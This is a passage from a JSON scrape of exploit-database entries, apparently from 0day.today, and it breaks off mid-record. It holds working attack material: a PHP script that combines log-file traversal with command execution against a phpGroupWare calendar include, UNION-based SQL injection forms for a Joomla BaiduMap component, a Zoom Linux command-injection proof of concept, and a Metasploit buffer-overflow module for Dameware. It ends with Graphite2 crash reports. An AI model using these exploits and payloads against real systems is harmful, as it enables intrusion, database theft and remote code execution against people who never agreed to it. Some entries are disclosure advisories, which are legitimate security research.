(strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\nfunction make_seed()\r\n{\r\n list($usec, $sec) = explode(' ', microtime());\r\n return (float) $sec + ((float) $usec * 100000);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n$cmd=urlencode($cmd);\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$paths=array(\r\n\"../../../../../../../../../../../../var/log/httpd/access_log\",\r\n\"../../../../../../../../../../../../var/log/httpd/error_log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../../../../../../apache/logs/error.log\",\r\n\"../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../../apache/logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../../logs/error.log\",\r\n\"../../../../../../logs/access.log\",\r\n\"../../../../../../../logs/error.log\",\r\n\"../../../../../../../logs/access.log\",\r\n\"../../../../../../../../logs/error.log\",\r\n\"../../../../../../../../logs/access.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error.log\",\r\n\"../../../../../../../../../../../../var/www/logs/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/access.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../../../../../../../../var/log/apache/access_log\",\r\n\"../../../../../../../../../../../../var/log/apache/access.l
og\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../../../../../../../../var/log/apache/error_log\",\r\n\"../../../../../../../../../../../../var/log/apache/error.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/log/error_log\"\r\n);\r\nfor ($i=0; $i<=count($paths)-1; $i++)\r\n{\r\n$a=$i+2;\r\necho \"[\".$a.\"] PATH: \".$paths[$i].\"\\r\\n\";\r\n$packet =\"GET \".$p.\"calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=\".$paths[$i].\"%00&cmd=\".$cmd.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"56789\"))\r\n{\r\n $temp=explode(\"56789\",$html);\r\n echo $temp[1];\r\n echo \"\\r\\nExploit succeeded...\\r\\n\";\r\n die;\r\n}\r\n}\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "published": "2006-08-29T00:00:00", "references": [], "reporter": "Kacper", "modified": "2006-08-29T00:00:00", "href": "https://0day.today/exploit/description/756"}
{"result": {"zdt": [{"lastseen": "2018-04-14T01:47:40", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-02-05T00:00:00", "title": "Joomla Zh BaiduMap 3.0.0.1 Component - SQL Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-14T01:47:40", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6605"], "modified": "2018-02-05T00:00:00", "id": "1337DAY-ID-29713", "href": "https://0day.today/exploit/description/29713", "sourceData": "<!--\r\n# # # # #\r\n# Exploit Title: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection\r\n# Dork: N/A\r\n# Vendor Homepage: http://zhuk.cc/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-baidumap/\r\n# Software Download: http://zhuk.cc/files/pkg_zhbaidumap-j30-3.0.0.1-final.zip\r\n# Version: 3.0.0.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6605\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# Want To Donate ?\r\n# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ\r\n# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# # # # #\r\n-->\r\n<html>\r\n<body>\r\n<!--com_zhbaidumap/controller.php-->\r\n \r\n<!--# 1)-->\r\n<!--L 27: public function getPlacemarkDetails() {........}-->\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails\" method=\"post\">\r\n<input name=\"id\" value=\"-11 UNION ALL SELECT 
11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"1-Ver Ayari\">\r\n</form>\r\n \r\n<!--# 2)-->\r\n<!--L 356: public function getPlacemarkHoverText() {........}-->\r\n<form action=\"http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText\" method=\"post\">\r\n<input name=\"id\" value=\"-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"2-Ver Ayari\">\r\n</form>\r\n \r\n<!--# 3)-->\r\n<!--L 411: public function getPathHoverText() {........}-->\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText\" method=\"post\">\r\n<input name=\"id\" value=\"-33 UNION ALL SELECT 
33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"3-Ver Ayari\">\r\n</form>\r\n \r\n<!--# 4)-->\r\n<!--L 756: public function getPathDetails() {........}-->\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails\" method=\"post\">\r\n<input name=\"id\" value=\"-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"4-Ver Ayari\">\r\n</form>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29713"}, {"lastseen": "2018-04-03T01:36:52", "references": [], "description": "The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes possible to trigger the vulnerability remotely. 
Version 2.0.106600.0904 is affected.", "edition": 1, "reporter": "Gabriel Quadros", "published": "2017-12-17T00:00:00", "title": "Zoom Linux Client 2.0.106600.0904 Command Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T01:36:52", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15049"], "modified": "2017-12-17T00:00:00", "id": "1337DAY-ID-29243", "href": "https://0day.today/exploit/description/29243", "sourceData": "Zoom Linux Client Command Injection Vulnerability (RCE)\r\n\r\n1. Advisory Information\r\n Conviso Advisory ID: CONVISO-17-003\r\n CVE ID: CVE-2017-15049\r\n CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n Date: 2017-10-01\r\n\r\n2. Affected Components\r\n Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb).\r\nOther versions may be\r\n vulnerable.\r\n\r\n3. Description\r\n The binary /opt/zoom/ZoomLauncher is vulnerable to command\r\ninjection because it uses user input\r\n to construct a shell command without proper sanitization.\r\n The client registers a scheme handler (zoommtg://) and this makes\r\npossible to trigger the\r\n vulnerability remotely.\r\n\r\n4. 
Details\r\n gef> r '$(uname)'\r\n Starting program: /opt/zoom/ZoomLauncher '$(uname)'\r\n ZoomLauncher started.\r\n cmd line: $(uname)\r\n $HOME = /home/user\r\n\r\n Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()\r\n gef> x/3i $pc\r\n => 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <[email\u00a0protected]>\r\n 0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]\r\n 0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff\r\n gef> x/s $rdi\r\n 0x7fffffffbf10: \"export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \\\"\"\r\n gef> x/s $rsi\r\n 0x7fffffffd750: \"$(uname) \"\r\n gef> c\r\n Continuing.\r\n export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \"\r\n\r\n Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) ()\r\n gef> x/3i $pc\r\n => 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <[email\u00a0protected]>\r\n 0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax\r\n 0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18]\r\n gef> x/s $rdi\r\n 0x7fffffffbf10: \"export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \\\"$(uname) \\\"\"\r\n\r\n --- RCE POC ---\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n <h1>Zoom POC RCE</h1>\r\n <script>\r\n window.location =\r\n'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)'\r\n </script>\r\n <body>\r\n </html>\r\n\r\n5. Solution\r\n Upgrade to latest version.\r\n\r\n6. Credits\r\n Ricardo Silva <[email\u00a0protected]>\r\n Gabriel Quadros <[email\u00a0protected]>\r\n\r\n7. 
Report Timeline\r\n Set 28, 2017 - Conviso sent first email asking for a channel to\r\ndiscuss the vulnerability.\r\n Set 28, 2017 - Vendor asked the report in the current channel.\r\n Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.\r\n Set 28, 2017 - Conviso asked if they could reproduce it.\r\n Set 28, 2017 - Vendor replied saying that the informations were\r\nforwarded to engineering team.\r\n Oct 5, 2017 - Vendor provided a patch candidate for testing.\r\n Oct 5, 2017 - Conviso pointed problems in the patch.\r\n Oct 11, 2017 - Vendor provided a patch candidate for testing.\r\n Oct 12, 2017 - Conviso pointed problems in the patch.\r\n Oct 23, 2017 - Conviso asked for status.\r\n Oct 27, 2017 - Conviso asked for status.\r\n Nov 1, 2017 - Conviso asked for status.\r\n Nov 3, 2017 - Vendor replied.\r\n Nov 6, 2017 - Conviso asked for status.\r\n Nov 6, 2017 - Vendor replied.\r\n Nov 9, 2017 - Conviso asked for status.\r\n Nov 13, 2017 - Conviso asked for status.\r\n Nov 15, 2017 - Conviso asked for status.\r\n Nov 16, 2017 - Vendor provided a patch candidate for testing.\r\n Nov 16, 2017 - The patch seems to fix the attack vector, although\r\nno further research was done.\r\n Nov 20, 2017 - Vendor thanked and marked the issue as solved,\r\nconsidering the patch as a\r\n sastifactory fix.\r\n Nov 30, 2017 - Vendor released the version 2.0.115900.1201\r\n\r\n8. References\r\n https://zoom.us/download\r\n https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux\r\n\r\n9. About Conviso\r\n Conviso is a consulting company specialized on application\r\nsecurity. Our values are based on the\r\n allocation of the adequate competencies on the field, a clear and\r\ndirect speech with the market,\r\n collaboration and partnership with our customers and business\r\npartners and constant investments\r\n on methodology and research improvement. 
For more information\r\nabout our company and services\r\n provided, please check our website at www.conviso.com.br.\r\n\r\n10. Copyright and Disclaimer\r\n The information in this advisory is Copyright 2017 Conviso\r\nApplication Security S/A and provided\r\n so that the society can understand the risk they may be facing by\r\nrunning affected software,\r\n hardware or other components used on their systems. In case you\r\nwish to copy information from\r\n this advisory, you must either copy all of it or refer to this\r\ndocument (including our URL). No\r\n guarantee is provided for the accuracy of this information, or\r\ndamage you may cause your systems\r\n in testing.\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29243"}, {"lastseen": "2018-01-06T09:16:17", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "James Fitts", "published": "2017-09-13T00:00:00", "title": "Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-06T09:16:17", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2842"], "modified": "2017-09-13T00:00:00", "id": "1337DAY-ID-28540", "href": "https://0day.today/exploit/description/28540", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack based buffer overflow vulnerability found\r\n in Dameware Mini Remote Control v4.0. 
The overflow is caused when sending\r\n an overly long username to the DWRCS executable listening on port 6129.\r\n The username is read into a strcpy() function causing an overwrite of\r\n the return pointer leading to arbitrary code execution.\r\n },\r\n 'Author' => [ 'James Fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2005-2842' ],\r\n [ 'BID', '14707' ],\r\n [ 'URL', 'http://secunia.com/advisories/16655' ],\r\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => 140,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\",\r\n 'StackAdjustment' => -3500,\r\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n 'Compat' =>\r\n {\r\n 'SymbolLookup' => '+ws2ord',\r\n },\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ \r\n 'Windows XP SP3 EN', \r\n { \r\n # msvcrt.dll\r\n # push esp/ retn\r\n 'Ret' => 0x77c35459, \r\n } \r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sept 01 2005'))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(6129),\r\n ], self.class )\r\n end\r\n \r\n def pkt1\r\n p = payload.encoded\r\n \r\n boom = \"\\x43\" * 259\r\n boom[100, 4] = [target.ret].pack('V')\r\n boom[108, p.length] = p\r\n \r\n packet = \"\\x00\" * 4056\r\n packet[0, 4] = \"\\x30\\x11\\x00\\x00\"\r\n packet[4, 4] = \"\\x00\\x00\\x00\\x00\"\r\n packet[8, 4] = \"\\xd7\\xa3\\x70\\x3d\"\r\n packet[12, 4] = \"\\x0a\\xd7\\x0d\\x40\"\r\n packet[16, 20] = \"\\x00\" * 20\r\n packet[36, 4] = \"\\x01\\x00\\x00\\x00\"\r\n \r\n packet[40, 4] = [0x00002710].pack('V')\r\n packet[196, 259] = rand_text_alpha(259)\r\n packet[456, 259] = boom\r\n packet[716, 259] = rand_text_alpha(259)\r\n packet[976, 259] = rand_text_alpha(259)\r\n packet[1236, 259] = rand_text_alpha(259)\r\n packet[1496, 259] = rand_text_alpha(259)\r\n \r\n 
return packet\r\n end\r\n \r\n def pkt2\r\n packet = \"\\x00\" * 4096\r\n packet[756, 259] = rand_text_alpha(259)\r\n \r\n return packet\r\n \r\n end\r\n \r\n def exploit\r\n connect\r\n \r\n sock.put(pkt1)\r\n sock.recv(1024)\r\n sock.put(pkt2)\r\n sock.recv(84)\r\n \r\n handler\r\n disconnect\r\n end\r\n \r\nend\r\n__END__\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28540"}, {"lastseen": "2018-02-15T21:25:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-05-26T00:00:00", "title": "Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-15T21:25:07", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:C/", "value": 5.7}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-05-26T00:00:00", "id": "1337DAY-ID-26025", "href": "https://0day.today/exploit/description/26025", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756\r\n \r\nWe have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:\r\n \r\n$ ./gr2fonttest -demand -cache /path/to/file\r\n \r\nBelow are three unique ASAN reports that we have triggered.\r\n \r\n--- cut ---\r\n==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0)\r\n #0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73\r\n #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16\r\n #2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) 
graphite/src/./inc/Endian.h:60:23\r\n #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24\r\n #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)\r\n==1191==ABORTING\r\n--- cut ---\r\n \r\n--- cut ---\r\n==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68\r\nREAD of size 1 at 0x61b00001fb95 thread T0\r\n #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73\r\n #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16\r\n #2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23\r\n #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24\r\n #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)\r\nShadow bytes 
around the buggy address:\r\n 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==1199==ABORTING\r\n--- cut ---\r\n \r\n--- cut ---\r\n==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838\r\nREAD of size 2 at 0x60400000db3a thread T0\r\n #0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27\r\n #1 0x57d0a7 in graphite2::_utf_iterator<unsigned short const>::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74\r\n #2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, 
unsigned int&) graphite/src/NameTable.cpp:173:18\r\n #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\n0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a)\r\nallocated by thread T0 here:\r\n #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x55a24a in unsigned short* graphite2::gralloc<unsigned short>(unsigned long) graphite/src/./inc/Main.h:88:28\r\n #2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37\r\n #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&)\r\nShadow bytes around the buggy address:\r\n 0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b20: fa fa fa fa fa fa 